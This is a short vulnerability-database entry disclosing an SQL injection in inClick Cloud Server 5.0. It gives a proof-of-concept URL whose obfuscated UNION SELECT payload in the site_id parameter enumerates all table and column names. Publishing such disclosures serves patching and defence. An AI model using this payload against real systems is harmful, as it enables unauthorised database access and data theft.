vendor:
inClick Cloud Server
by:
Ihsan Sencan
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: inClick Cloud Server
Affected Version From: 5.0
Affected Version To: 5.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:inclick:inclick_cloud_server
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
inClick Cloud Server 5.0 – SQL Injection
The vulnerability allows an publisher to inject sql commands into the vulnerable parameter. Proof of Concept: http://localhost/[PATH]/client.php?pageid=sites&subpid=modify&site_id=[SQL] 1-1++/*!00008UniOn*/+/*!00008sEleCT*/+0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129--+-
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.